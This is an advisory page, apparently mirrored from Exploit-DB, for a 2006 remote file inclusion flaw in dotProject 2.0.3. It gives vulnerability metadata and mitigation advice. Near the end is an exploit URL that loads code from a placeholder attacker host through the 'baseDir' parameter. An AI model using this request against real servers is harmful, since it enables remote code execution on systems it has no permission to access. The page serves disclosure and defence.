header-logo
Suggest Exploit
vendor:
dotProject
by:
h4ntu
7,5
CVSS
HIGH
Remote File Inclusion
94
CWE
Product Name: dotProject
Affected Version From: 2.0.3
Affected Version To: 2.0.3
Patch Exists: YES
Related CWE: CVE-2006-3117
CPE: o:dotproject:dotproject:2.0.3
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2006-0573/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2006-3117/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2006-0573/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

dotProject <= 2.0.3 Remote File Inclusion

dotProject is vulnerable to a remote file inclusion vulnerability. This vulnerability is due to a failure in the application to properly sanitize user-supplied input to the 'baseDir' parameter of the 'db_adodb.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system with the privileges of the webserver process.

Mitigation:

Upgrade to the latest version of dotProject.
Source

Exploit-DB raw data:

Credits : h4ntu
Title : dotProject <= 2.0.3 Remote File Inclusion
URL : http://www.dotproject.net/
Exploit : http://target.com/[dotProject_path]/includes/db_adodb.php?baseDir=[attacker] 

# milw0rm.com [2006-06-20]

Navigation

Suggest Exploit

Services By CQR